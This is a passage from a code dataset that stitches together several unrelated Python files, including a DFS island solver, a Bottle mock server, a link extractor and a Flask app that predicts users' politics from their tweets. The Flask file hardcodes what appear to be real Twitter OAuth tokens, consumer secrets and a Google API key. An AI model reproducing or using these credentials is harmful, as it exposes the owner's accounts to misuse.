u'default'\n\t\t# \tdebug('just set mode to default...')\n\t\tif liveobj_valid(device) and device.can_have_chains:\n\t\t\tif not device.can_have_drum_pads:\n\t\t\t\tself._toggle(device)\n\t\t\telse:\n\t\t\t\tif self._was_in_chain_mode:\n\t\t\t\t\tself._modes.selected_mode = 'default'\n\t\t\t\t\tself._was_in_chain_mode = False\n\t\t\t\telse:\n\t\t\t\t\tself._show_chains(device)\n\n\t\telse:\n\t\t\tself.bank_selection.set_device(device)\n\t\t\tself._modes.selected_mode = 'bank_selection'\n\n\t@singledispatchmethod\n\tdef _on_pressed_delayed(self, _):\n\t\tpass\n\n\t@singledispatchmethod\n\tdef _on_pressed_delayed(self, device):\n\t\tself._show_chains(device)\n\t\tself._begin_move_device(device)\n\n\t@singledispatchmethod\n\tdef _delete_item(self, pad):\n\t\tpass\n\n\t@singledispatchmethod\n\tdef _delete_item(self, device):\n\t\tdelete_device(device)\n\n\tdef _show_chains(self, device):\n\t\tif device.can_have_chains:\n\t\t\tself.chain_selection.set_parent(device)\n\t\t\tself._modes.selected_mode = 'chain_selection'\n\n\t@listens('back')\n\tdef __on_bank_selection_closed(self):\n\t\tself._modes.selected_mode = 'default'\n\n\t@listens('back')\n\tdef __on_chain_selection_closed(self):\n\t\tself._modes.selected_mode = 'default'\n\n\tdef _exit_chain_selection(self):\n\t\tdebug('last_pressed_button:', self._last_pressed_button_index)\n\n\tdef _update_device(self):\n\t\tif not self._should_select_drum_pad() and not self._is_drum_rack_selected():\n\t\t\tself._modes.selected_mode = 'default'\n\t\t\tself._update_item_provider(self._device_component.device())\n\n\tdef _is_drum_rack_selected(self):\n\t\tselected_item = self._flattened_chain.selected_item\n\t\tinstrument = self._find_top_level_instrument()\n\t\treturn liveobj_valid(selected_item) and isinstance(selected_item, Live.RackDevice.RackDevice) and selected_item.can_have_drum_pads and not liveobj_changed(selected_item, instrument)\n\n\tdef _find_top_level_instrument(self):\n\t\treturn find_if(lambda device: device.type == Live.Device.DeviceType.instrument, self._current_track().devices)\n\n\t@listens('selected_device')\n\tdef _device_selection_in_track_changed(self):\n\t\tnew_selection = self.song.view.selected_track.view.selected_device\n\t\tif self._can_update_device_selection(new_selection):\n\t\t\tself._modes.selected_mode = 'default'\n\t\t\tself._update_item_provider(new_selection)\n\n\tdef _toggle(self, item):\n\t\tview = item.view\n\t\tif view.is_collapsed:\n\t\t\tview.is_collapsed = False\n\t\t\tview.is_showing_chain_devices = True\n\t\telse:\n\t\t\tview.is_showing_chain_devices = not view.is_showing_chain_devices\n\n\tdef _can_update_device_selection(self, new_selection):\n\t\tcan_update = liveobj_valid(new_selection)\n\t\tdrum_pad_selected_or_requested = self.is_drum_pad_selected or self._should_select_drum_pad()\n\t\tif can_update and drum_pad_selected_or_requested:\n\t\t\tif is_empty_rack(new_selection):\n\t\t\t\tcan_update = False\n\t\t\tif can_update and self.is_drum_pad_selected:\n\t\t\t\tcan_update = not is_first_device_on_pad(new_selection, self._flattened_chain.selected_item)\n\t\telif not can_update and not drum_pad_selected_or_requested:\n\t\t\tcan_update = True\n\t\treturn can_update\n\n\tdef _update_item_provider(self, selection):\n\t\tself._flattened_chain.selected_item = selection\n\t\tif not is_drum_pad(selection):\n\t\t\tself._current_track().drum_pad_selected = False\n\t\tself.notify_drum_pad_selection()\n","sub_path":"Live 11 Python 
Scripts/Aumhaa_Util/device_navigation.py","file_name":"device_navigation.py","file_ext":"py","file_size_in_byte":26543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"93538740","text":"def dfs(grid, i, j):\n    \"\"\"Sink the island containing (i, j) and return its area.\"\"\"\n    row = len(grid)\n    col = len(grid[0])\n    if i < 0 or j < 0 or i >= row or j >= col or grid[i][j] != 1:\n        return 0\n    grid[i][j] = 0\n    return (1 + dfs(grid, i - 1, j) + dfs(grid, i + 1, j)\n            + dfs(grid, i, j - 1) + dfs(grid, i, j + 1))\n\n\ndef max_area_of_islands(grid):\n    \"\"\"\n    :type grid: List[List[int]]\n    :rtype: int\n    \"\"\"\n\n    area = 0\n    for i in range(len(grid)):\n        for j in range(len(grid[i])):\n            if grid[i][j] == 1:\n                area = max(area, dfs(grid, i, j))\n\n    return area\n\n","sub_path":"all_problems/695. Max Area of Island/max_island_area.py","file_name":"max_island_area.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"593428460","text":"import glob\n\nclass FileNameGetter(object):\n    def __init__(self):\n        self.group = 'cancer_01'\n        self.file_names = []\n\n    def process(self):\n        file_names = []\n        path = self.group + '/*/*CC.OVERLAY'\n        for overlay_file in glob.glob(path):\n            with open(overlay_file, 'r') as f:\n                contents = f.read()\n            contents = contents.lower()\n            if 'calcification' in contents:\n                file_names.append(overlay_file)\n        return file_names\n\n    def get_file_names(self):\n        self.file_names = self.process()\n        return self.file_names\n\nF = FileNameGetter()\nF.get_file_names()\n","sub_path":"utils/ddsm_util.py","file_name":"ddsm_util.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"34779689","text":"import requests as rq\nimport re\n\n\ndef motif_depuis_chaine(chaine):\n    \"\"\"Create a re pattern with the first letter in upper or lower case.\"\"\"\n    premiere_lettre, suffix = chaine[0], chaine[1:]\n    return re.compile(\n        \"[\" \n        + premiere_lettre.upper() \n        + premiere_lettre.lower() \n        + \"]\" \n        + suffix\n    )\n\ndef nb_occurences(nom_du_pays):\n    \"\"\"Count how many times the country name appears on its Wikipedia page.\"\"\"\n    page = rq.get(\"https://fr.wikipedia.org/wiki/\" + nom_du_pays)\n    texte = page.text\n    motif = motif_depuis_chaine(nom_du_pays)\n    return len(motif.findall(texte))\n    \n\n\nif __name__ == \"__main__\":\n    print(nb_occurences(\"France\"))","sub_path":"Semaine01/occurences_v2.py","file_name":"occurences_v2.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"607503765","text":"import unittest\nfrom fontParts.base import FontPartsError\n\n\nclass TestGroups(unittest.TestCase):\n\n    def getGroups_generic(self):\n        groups, unrequested = self.objectGenerator(\"groups\")\n        groups.update({\n            \"group 1\" : [\"A\", \"B\", \"C\"],\n            \"group 2\" : [\"x\", \"y\", \"z\"],\n            \"group 3\" : []\n        })\n        return groups, unrequested\n\n    # ---\n    # len\n    # ---\n\n    def test_len(self):\n        groups, unrequested = self.getGroups_generic()\n        self.assertEqual(\n            len(groups),\n            3\n        )\n        groups.clear()\n        self.assertEqual(\n            len(groups),\n            0\n        
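The occurences_v2.py record above builds its regular expression by hand so that only the first letter is case-insensitive. A standalone check of that construction; pattern_from_string is a hypothetical English-named twin of motif_depuis_chaine, and like the original it assumes the rest of the string contains no regex metacharacters:

import re

def pattern_from_string(s):
    # "France" -> re.compile("[Ff]rance"): only the first letter varies in case.
    return re.compile("[" + s[0].upper() + s[0].lower() + "]" + s[1:])

assert pattern_from_string("France").findall("France, france, FRANCE") == ["France", "france"]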
)\n","sub_path":"Lib/fontParts/test/test_groups.py","file_name":"test_groups.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"106209175","text":"from skimage import morphology\nimport cv2\nimport numpy as np\nimport sys\n\n\ndef get_image():\n size = (w, h) = (100, 100)\n img = np.zeros(size, np.uint8)\n cv2.rectangle(img, (10, 10), (19, 19), (128), -1)\n cv2.rectangle(img, (30, 20), (39, 39), (128), -1)\n cv2.rectangle(img, (40, 30), (49, 49), (128), -1)\n cv2.rectangle(img, (50, 70), (89, 79), (128), -1)\n return img\n\n\ndef show_image(img):\n cv2.imshow('result', img), cv2.waitKey(0)\n\n\nif __name__ == '__main__':\n img = get_image()\n show_image(img)\n\n labels = morphology.label(img, background=0)\n label_number = 0\n while True:\n temp = np.uint8(labels==label_number) * 255\n if not cv2.countNonZero(temp):\n break\n show_image(temp)\n label_number += 1\n\n cv2.destroyAllWindows()\n","sub_path":"explore/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"579810203","text":"import os\r\ndef move(n,a='A',b='B',c='C'):\r\n\tif n==1:\r\n\t\tprint('%s --> %s'%(a,c))\r\n\telse:\r\n\t\treturn move(n-1,a,c,b),move(1,a,b,c),move(n-1,b,a,c)\r\n\r\n\r\nk=input('Please input the number.')\r\nprint('\\n\\n')\r\nmove(int(k))\r\nprint('\\n\\nYou may need',2**int(k)-1, 'steps to move the Tower of Hanoi.\\n\\n')\r\n\r\nos.system('pause')","sub_path":"Hanoi.py","file_name":"Hanoi.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"314684023","text":"#!/usr/bin/python\n\n\"\"\"\nwebserver-bottle.py: A webserver that mimics the Interactives platform on iOS and Android. \nRequires the Python Bottle web framework.\n\"\"\"\n\n__author__ = \"Jason Shah\"\n__copyright__ = \"Copyright 2013-2015, Mediafly, Inc.\"\n__version__\t\t= \"1.6\"\n\n\n\nfrom bottle import route, get, post, put, run, static_file, request, response, abort\nfrom pprint import pprint\nfrom json import dumps\nimport re\nimport json\nimport sys\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n\n\n# Helper functions\n### convertAndReformatForJson performs the following transformations:\n### 1. Converts strings from Unicode to UTF-8, as JSON chokes on Python-style Unicode strings\n### 2. Convert mfly://data/image/ prefixes to Placeholder.it links\n### 3. 
Convert Python True/False/None to JavaScript true/false/{empty string}\ndef convertAndReformatForJson(input):\n\tif isinstance(input, dict):\n\t\treturn {convertAndReformatForJson(key): convertAndReformatForJson(value) for key, value in input.iteritems()}\n\telif isinstance(input, list):\n\t\treturn [convertAndReformatForJson(element) for element in input]\n\telif isinstance(input, unicode):\n\t\tinput = input.replace('mfly://data/image/', 'http://placehold.it/600x600&text=')\n\t\treturn input.encode('utf-8')\n\telse:\n\t\tif (input == True and str(input) == \"True\"):\n\t\t\treturn True\n\t\tif (input == False and str(input) == \"False\"):\n\t\t\treturn False\n\t\tif (input == None):\n\t\t\treturn \"\"\n\t\tif isinstance(input, str):\n\t\t\tinput = input.replace('mfly://data/image/', 'http://placehold.it/600x600&text=')\n\t\treturn input\n\n\n\n\n###\n### Initialization\n###\n# mflyDataInit return value\nmflyDataInit_response = {\n\t'user': \"jdoe@mediafly.com\",\n\t'displayName': \"John Doe\",\n\t'id': \"5559d4a298225972b02301597product82851\",\n\t'item': \"Interactive\",\n\t'osType': \"Development\",\n\t'osVersion': \"6.1.3\",\n\t'appVersion': \"6.1.4.405\",\n\t'deviceId': \"46a5f0630a13a8744e8b5cc6309b46\",\n\t'appId': \"1de8c94235905abbbf7638acce\",\n\t'lastUpdated': \"2014-02-03T07:04:07-06:00\"\n}\n\n\n\n# Load hierarchy into memory\n\njson_file = open('scripts/hierarchy.json')\nhierarchy = convertAndReformatForJson(json.load(json_file))\nisOnline = True\n\n\n#############################\n# Interactive baseline data #\n#############################\n@get('/data/interactive')\ndef getInteractiveData():\n\tresponse.content_type = 'application/json'\n\treturn json.dumps(mflyDataInit_response)\n\n\n\n##########################\n# Save and restore state #\n##########################\nmemory = {}\n\n@get('/data/info/<key>')\ndef getOrPut(key):\n\tmethod = request.query.method\n\tvalue = request.query.value\n\tif method.lower() != \"put\":\n\t\t# Treat as GET\n\t\tif key not in memory.keys():\n\t\t\tabort(404)\n\t\treturn memory[key]\n\telse:\n\t\t# Treat as PUT\n\t\tmemory[key] = value\n\n\n@get('/data/info')\ndef getMany():\n\tprefix = request.query.prefix\n\tif prefix:\n\t\tif sys.version_info.major == 2:\n\t\t\treturn {k:v for (k,v) in memory.iteritems() if k.startswith(prefix)}\n\t\telse:\n\t\t\treturn {k:v for (k,v) in memory.items() if k.startswith(prefix)}\n\telse:\n\t\treturn memory\n\t\t \n\n\n##############\n# Get Folder #\n##############\n\n@get('/data/folder/<id>')\ndef getFolder(id):\n\tif id in hierarchy:\n\t\t# Now lets construct the folder\n\t\tfolder = []\n\t\tthis_folder = hierarchy[id]\n\t\tif this_folder['items']:\n\t\t\tfor itemkey in this_folder['items']:\n\t\t\t\tfolder.append(hierarchy[itemkey])\n\t\t\tresponse.content_type = 'application/json'\n\t\t\treturn json.dumps(folder)\n\t\telse:\n\t\t\tresponse.content_type = 'application/json'\n\t\t\treturn '[]'\n\telse:\n\t\tabort(404, id + ' not found')\n\n############\n# Get Item #\n############\n\n@get('/data/item/<id>')\ndef getItem(id):\n\tif id in hierarchy:\n\t\tresponse.content_type = 'application/json'\n\t\treturn json.dumps(hierarchy[id])\n\telse:\n\t\tabort(404, id + ' not found')\n\n##############\n# Downloader #\n##############\n@get('/data/download/status')\ndef getDownloadStatus():\n\tresponse.content_type = 'application/json'\n\treturn '{ \"progress\": 0.12, \"fails\": 1 }'\n@get('/data/download/status/<id>')\ndef getDownloadStatusForItem(id):\n\tresponse.content_type = 'application/json'\n\treturn '{ \"progress\": 0.5 
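A client-side usage sketch for the key/value routes above, assuming the server is running locally on the host and port passed to run() at the bottom of this file; the key name lastSlide and the use of the requests library are illustrative. Writes are tunneled through GET with method=put, exactly as getOrPut() expects:

import requests

BASE = 'http://127.0.0.1:8000'

# Store a value: getOrPut() treats ?method=put as a write.
requests.get(BASE + '/data/info/lastSlide', params={'method': 'put', 'value': '7'})
# Read it back, then list all keys sharing a prefix via getMany().
print(requests.get(BASE + '/data/info/lastSlide').text)                     # -> 7
print(requests.get(BASE + '/data/info', params={'prefix': 'last'}).json())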
}'\n\n\n\n###############\n# Collections #\n###############\ncollections = {}\ncollectionsIdCounter = 1\n\n@get('/data/collections')\ndef getCollections():\n\tret = []\n\tfor c in collections:\n\t\tret.append(collections[c])\n\tresponse.content_type = 'application/json'\n\treturn json.dumps(ret)\n\n@get('/data/createCollection')\ndef createCollection():\n\tglobal collectionsIdCounter\n\n\t_name = request.query.name\n\t_id = str(collectionsIdCounter)\n\tcollectionsIdCounter += 1\n\tobj = {\n\t\t\"id\": _id,\n\t\t\"name\": _name,\n\t\t\"items\": []\n\t}\n\tcollections[_id] = obj\n\tresponse.content_type = 'application/json'\n\treturn json.dumps(obj)\n\n@get('/data/addItemToCollection')\ndef addItemToCollection():\n\t_collectionId = request.query.id\n\t_itemId = request.query.item\n\tif _itemId in hierarchy:\n\t\titem = hierarchy[_itemId]\n\t\tif _collectionId in collections:\n\t\t\tcollection = collections[_collectionId]\n\t\t\tif not \"items\" in collection:\n\t\t\t\tcollection[\"items\"] = []\n\t\t\tcollection[\"items\"].append(item[\"id\"])\n\t\t\treturn \"\"\n\t\telse:\n\t\t\tabort(404, 'Collection ' + _collectionId + ' not found')\n\telse:\n\t\tabort(404, 'Item ' + _itemId + ' not found')\n\n\n@get('/data/collection/<id>')\ndef getCollection(id):\n\tif id in collections:\n\t\t# Construct the response\n\t\tcollection = []\n\t\tfor itemId in collections[id]['items']:\n\t\t\tcollection.append(hierarchy[itemId])\n\t\tresponse.content_type = 'application/json'\n\t\treturn json.dumps(collection)\n\telse:\n\t\tabort(404, id + ' not found')\n\n\n##########\n# Search #\n##########\n\nDO_NOT_SEARCH_LIST = [\"autoStart\", \"id\", \"items\", \"thumbnailUrl\", \"type\", \"url\", \"launched\", \"progress\", \"pages\"]\n@get('/data/search')\ndef search():\n\tterm = request.query.term\n\n\tret = []\n\tfor k in hierarchy:\n\t\tif (k != 'version'):\n\t\t\tfor v in hierarchy[k]:\n\t\t\t\tif not(v in DO_NOT_SEARCH_LIST) and type(hierarchy[k][v]) is str and term in hierarchy[k][v]:\n\t\t\t\t\tret.append(hierarchy[k])\n\tresponse.content_type = 'application/json'\n\treturn json.dumps(ret)\n\n\n##########\n# Filter #\n##########\n@get('/data/filter')\ndef filter():\n\tret = []\n\n\tfor k_id in hierarchy:\n\t\tif (k_id != 'version'):\n\t\t\tfoundcount = 0\n\t\t\tfor key in request.query:\n\t\t\t\t# Loop through each of the key=value queryparams and test each key=value combination\n\t\t\t\tval = request.query[key]\n\t\t\t\tif (val.startswith('\"') and val.endswith('\"')):\n\t\t\t\t\tval = val.strip('\"')\n\t\t\t\telif (val == 'true'):\n\t\t\t\t\tval = True\n\t\t\t\telif (val == 'false'):\n\t\t\t\t\tval = False\n\n\t\t\t\tfor k_key in hierarchy[k_id]:\n\t\t\t\t\tif (key == k_key):\n\t\t\t\t\t\tif str(val) == str(hierarchy[k_id][k_key]):\n\t\t\t\t\t\t\tfoundcount = foundcount + 1\n\t\t\t\t\t\t\tbreak\n\t\t\t# We found each of the key=value combinations for this object k_id\n\t\t\tif foundcount == len(request.query):\n\t\t\t\tret.append(hierarchy[k_id])\n\tresponse.content_type = 'application/json'\n\treturn json.dumps(ret)\n\n\n\n#########\n# Embed #\n#########\n# To work with Embed, place the item that will be embedded into the\n# [Interactive root]/embeds folder with the same name as the ID of the item.\n# Images will be of the form [id].png.\n# Other interactives will be of the form [id], where [id] is a folder, and\n# within that folder is, at least, index.html.\n# Data items (JSON, CSV, XML) will be of the form [id] with no extension\n# Pages of documents will be of the form [id]/[page].png, where [id] is a\n# 
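The /data/filter route above coerces each query value before comparing: double-quoted values match as strings, bare true/false become booleans, and both sides are finally compared through str(). The same rule pulled out as a plain function; a sketch, with illustrative sample values:

def coerce_filter_value(val):
    # Mirrors the coercion branch inside filter() above.
    if val.startswith('"') and val.endswith('"'):
        return val.strip('"')
    if val == 'true':
        return True
    if val == 'false':
        return False
    return val

assert coerce_filter_value('"pdf"') == 'pdf'
assert coerce_filter_value('true') is True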
folder, and [page].png is the specified page of the document as a PNG image.\n@get('/data/embed/<id>')\ndef embed(id):\n\tif id in hierarchy:\n\t\tif hierarchy[id]['type'] == 'image':\n\t\t\t# XXX TODO Generalize this for all images. And return a default image if the specific one doesn't exist.\n\t\t\treturn static_file(id + '.png', root='embeds')\n\t\telif hierarchy[id]['type'] == 'zip':\n\t\t\treturn static_file(id + '/index.html', root='embeds')\n\t\telif hierarchy[id]['type'] == 'data':\n\t\t\treturn static_file(id, root='embeds')\n\t\telif hierarchy[id]['type'] == 'pdf':\n\t\t\treturn static_file(id + '/' + request.query.position + '.png', root='embeds')\n\telse:\n\t\tabort(404, id + ' not found')\n\n\n###############\n# Other calls #\n###############\n\n\n@get('/data/onlineStatus')\ndef getOnlineStatus():\n\tisOnlineString = 'online' if isOnline else 'offline'\n\tresponse.content_type = 'application/json'\n\treturn '{ \"status\": \"' + isOnlineString + '\" }'\n\n\n\n#############\n# Heartbeat #\n#############\n@get('/_heartbeat')\ndef heartbeat():\n\tglobal isOnline\n\tif (request.query.isOnline != ''):\n\t\tisOnline = True if (request.query.isOnline == 'true') else False\n\n\tseq = int(request.query.seq)\n\tif seq == 0:\n\t\treturn \"mflyDataInit(\" + str(json.dumps(mflyDataInit_response)) + \")\"\n\telif seq == 1:\n\t\treturn \"mflyResume()\"\n\telif seq == 2:\n\t\treturn 'mflyInit(' + str(json.dumps(hierarchy)) + ')'\n\treturn ''\n\n\n\n#################\n# Static Routes #\n#################\n@get('/')\ndef index():\n\treturn static_file('index.html', root='app/')\n\n@get('/js/<filename>')\ndef javascripts(filename):\n\treturn static_file(filename, root='app/js')\n\n@get('/bower_components/<filename>')\ndef bower(filename):\n\treturn static_file(filename, root='app/bower_components')\n\n@get('/lib/<filename>')\ndef js_libraries(filename):\n\treturn static_file(filename, root='app/lib')\n\n@get('/css/<filename>')\ndef stylesheets(filename):\n\treturn static_file(filename, root='app/css')\n\n@get('/img/<filename>')\ndef images(filename):\n\treturn static_file(filename, root='app/img')\n\n@get('/fonts/<filename>')\ndef fonts(filename):\n\treturn static_file(filename, root='app/fonts')\n\n\n\nrun(host='127.0.0.1', port=8000, debug=True, reloader=True)\n\n","sub_path":"examples/Sync status/scripts/webserver-bottle.py","file_name":"webserver-bottle.py","file_ext":"py","file_size_in_byte":9523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"93982861","text":"#!/usr/bin/env python3\nfrom os import path\nbirthdayfile = \"birthdays.json\"\nif path.exists(birthdayfile):\n    print(\"Welcome to the birthday dictionary. We know the birthday of:\")\n    # Create empty dictionary object to hold birthdays\n    mydict = {}\n    with open(birthdayfile) as birthdays:\n        for data in birthdays:\n            splitdata = data.split(\":\")\n            name = splitdata[0]\n            birthday = splitdata[1]\n            mydict[name] = birthday\n            print(name)\n\n    val = \"\"\n    while len(val) == 0:\n        req = input(\"Whose birthday do you want to look up? 
\")\n        req = req.title()\n        try:\n            val = mydict[req]\n            print(f\"{req}'s birthday is on {val}\")\n        except KeyError:\n            print(f\"{req} not found in the dictionary\")\n","sub_path":"practicepython/ex33-part2.py","file_name":"ex33-part2.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"166155706","text":"#!/usr/bin/python\n#-*- coding: utf-8 -*-\n\nimport logging\nimport re\n\nfrom urlparse import urlparse, urljoin\nfrom bs4 import BeautifulSoup\nfrom os import environ\nfrom dotenv import load_dotenv, find_dotenv\n\nclass ParserLinks(object):\n\n    @classmethod\n    def extract_urls(cls, url_curr, html):\n        load_dotenv(find_dotenv(usecwd='..')) \n        \n        SCHEME = environ.get('SCHEME') \n        links = []\n\n        def internal_links(link):\n            \n            def external_links(link):\n                \n                link = re.sub(r\"^http(s)?://\", '', link)\n                link = re.sub(r\"/$\", '', link)\n                return link\n            \n            if not re.search(r\"^http\", link):\n                link = urljoin('{scheme}{host}'.format(scheme=SCHEME, host=url_curr), link)\n                link = re.sub(r\"^http(s)?://\", '', link)\n                link = re.sub(r\"/$\", '', link)\n            else:\n                link = external_links(link)\n\n            return link\n\n        try: \n            parser = BeautifulSoup(html, 'lxml')\n\n            for a in parser.find_all('a'):\n\n                if a.has_attr('href'):\n                    link = a.get('href')\n                    link = internal_links(link)\n                    # if not re.search(r\"^http\", link):\n                    #     link = urljoin('{scheme}{host}'.format(scheme=SCHEME, host=cls.url_curr), link)\n                    \n                    # link = re.sub(r\"^http(s)?://\", '', link)\n                    # link = re.sub(r\"/$\", '', link)\n                    links.append(link)\n\n            return links\n        \n        except Exception as error:\n\n            if hasattr(error, 'message'):\n                logging.error('extract_urls.py --> {}'.format(error.message))\n\n            return links\n","sub_path":"www_traveler/extract_urls.py","file_name":"extract_urls.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"334515491","text":"import flask\nimport twitter\nfrom flask import Flask, request, render_template\nfrom twitter import *\nimport json\nimport requests\nimport pandas as pd\nimport numpy as np\nimport nltk\nfrom nltk.corpus import stopwords\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer, TfidfVectorizer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.metrics import classification_report, confusion_matrix\n\nOAUTH_TOKEN=\"2464717370-ztIheNqKFIr9ll1ZG3OEa1SxRPTGY8k1XL3Ukj0\"\nOAUTH_SECRET=\"doEQPqBTLo22FrakNfY2q3jdLJyary6TFcLT8sv8AJes7\"\nCONSUMER_KEY=\"0J1e4CLZOLJTG1fVQaQya4fH1\"\nCONSUMER_SECRET=\"SUZK3xOyW4DJzY0rqr8pr2PQuVjEjEPgUNd73fMYd5eXSg4sY9\"\n\ntwitter = Twitter (\n\tauth=OAuth(OAUTH_TOKEN, OAUTH_SECRET, CONSUMER_KEY, CONSUMER_SECRET)\n)\n\ndef model(user_df):\n\n    total_df = pd.read_csv('./data/total.csv')\n    stop_words = set(stopwords.words('english'))\n    \n    def pre_process(mess):\n        mess = nltk.word_tokenize(mess)\n        clean = [word.lower() for word in mess if word.lower() not in stop_words]\n        return clean\n\n    def piped_vect(X,y,user_x):\n        X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3) \n        text_clf = Pipeline([('vect', CountVectorizer(analyzer=pre_process,encoding='utf-8',strip_accents='unicode',max_df=0.8,min_df=0.3)),('tfidf',TfidfTransformer()),('clf', MultinomialNB()),])\n        text_clf = text_clf.fit(X_train, y_train)\n        predicted = text_clf.predict(user_x)\n        return predicted\n\n    
pred = piped_vect(total_df['Tweets'],total_df['pol'],user_df['Tweets'])\n return pred\n\napp = Flask(__name__)\n\n@app.route('/', methods=['POST'])\n\ndef form_input():\n\tif request.method == 'POST':\n\t\tscreen_name = request.form['screen_name']\n\t\tlocation = request.form['location']\n\n\t# user_tweets = twitter.statuses.user_timeline(count=1000, screen_name=screen_name)\n\n\tdata = {'Sources': [], 'Tweets': []}\n\tdata['Sources'].append(screen_name)\n\n\ttlist = []\n\n\tfor t in twitter.statuses.user_timeline(count=1000, screen_name=screen_name, tweet_mode=\"extended\"):\n\t\ttlist.append(t['full_text'].encode(\"utf-8\"))\n\tdata['Tweets'].append(tlist)\n\n\tdf = pd.DataFrame(data, columns=['Sources', 'Tweets'])\n\n\t# app.logger.debug(itpTweets)\n\n\t #DF IS THE IMPORTANT DATAFRAME\n\t #DF->MODEL\n\tpred = model(df)\n\t \n\taddress = location\n\n\tparams = {\n\t\t'address': address,\n\t}\n\n\tr = requests.get(\"https://www.googleapis.com/civicinfo/v2/voterinfo?key=AIzaSyCDTh1Io4GW47gv12B5cEqOV6uA93Hx6Ew\", params=params)\n\tdata = r.json()\n\telection = data['election']['name']\n\tif 'pollingLocations' in data:\n\t\tpolling_places = data['pollingLocations']\n\telse:\n\t\tpolling_places = []\n\tpolling_places_list = []\n\tif 'earlyVoteSites' in data:\n\t\tearly_vote_sites = data['earlyVoteSites']\n\telse:\n\t\tearly_vote_sites = []\n\tearly_vote_sites_list = []\n\tcontests = data['contests']\n\tcontest_type = []\n\tcontest_office_federal = []\n\tcontest_office_state = []\n\tcontest_office_local = []\n\tcontest_candidates_federal = []\n\tcontest_candidates_state = []\n\tcontest_candidates_local = []\n\tfor contest in contests:\n\t\tif 'type' in contest:\n\t\t\tcontest_type.append(contest['type'])\n\t\tif 'level' in contest:\n\t\t\tif 'country' in contest['level']:\n\t\t\t\tcontest_office_federal.append(contest['office'])\n\t\t\t\tfor c in contest['candidates']:\n\t\t\t\t\tif c['party'] == 'Democratic Party':\n\t\t\t\t\t\tpartyColor = 'blue'\n\t\t\t\t\telif c['party'] == 'Republican Party':\n\t\t\t\t\t\tpartyColor = 'red'\n\t\t\t\t\telse:\n\t\t\t\t\t\tpartyColor = 'grey'\n\n\t\t\t\t\tsplitName = c['name'].split();\n\t\t\t\t\tformattedName = splitName[0] + \"%20\" + splitName[1]\n\t\t\t\t\timgRequest = requests.get(\"https://en.wikipedia.org/w/api.php?action=query&titles=\" + formattedName + \"&format=json&prop=pageimages&formatversion=2\")\n\t\t\t\t\timgData = imgRequest.json()\n\t\t\t\t\tif 'thumbnail' in imgData['query']['pages'][0]:\n\t\t\t\t\t\timgUrl = imgData['query']['pages'][0]['thumbnail']['source']\n\t\t\t\t\t\tcontest_candidates_federal.append({'name': c['name'], 'office': contest['office'], 'imgUrl': imgUrl, 'partyColor': partyColor})\n\t\t\t\t\telse:\n\t\t\t\t\t\tcontest_candidates_federal.append({'name': c['name'], 'office': contest['office'], 'imgUrl': 'https://freeiconshop.com/wp-content/uploads/edd/person-solid.png', 'partyColor': partyColor})\n\t\t\telif 'administrativeArea1' in contest['level']:\n\t\t\t\tcontest_office_state.append(contest['office'])\n\t\t\t\tfor c in contest['candidates']:\n\t\t\t\t\tif c['party'] == 'Democratic Party':\n\t\t\t\t\t\tpartyColor = 'blue'\n\t\t\t\t\telif c['party'] == 'Republican Party':\n\t\t\t\t\t\tpartyColor = 'red'\n\t\t\t\t\telse:\n\t\t\t\t\t\tpartyColor = 'grey'\n\n\t\t\t\t\tsplitName = c['name'].split();\n\t\t\t\t\tformattedName = splitName[0] + \"%20\" + splitName[1]\n\t\t\t\t\timgRequest = requests.get(\"https://en.wikipedia.org/w/api.php?action=query&titles=\" + formattedName + 
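The model() helper defined earlier in this file chains CountVectorizer, TfidfTransformer and MultinomialNB inside piped_vect(). A condensed equivalent sketch, under the assumption that the same CSV columns are available; TfidfVectorizer folds the first two pipeline steps into one:

from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.naive_bayes import MultinomialNB
from sklearn.pipeline import make_pipeline

# One vectorize-and-weight step instead of CountVectorizer + TfidfTransformer.
text_clf = make_pipeline(TfidfVectorizer(stop_words='english', max_df=0.8, min_df=0.3),
                         MultinomialNB())
# text_clf.fit(total_df['Tweets'], total_df['pol'])
# pred = text_clf.predict(user_df['Tweets'])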
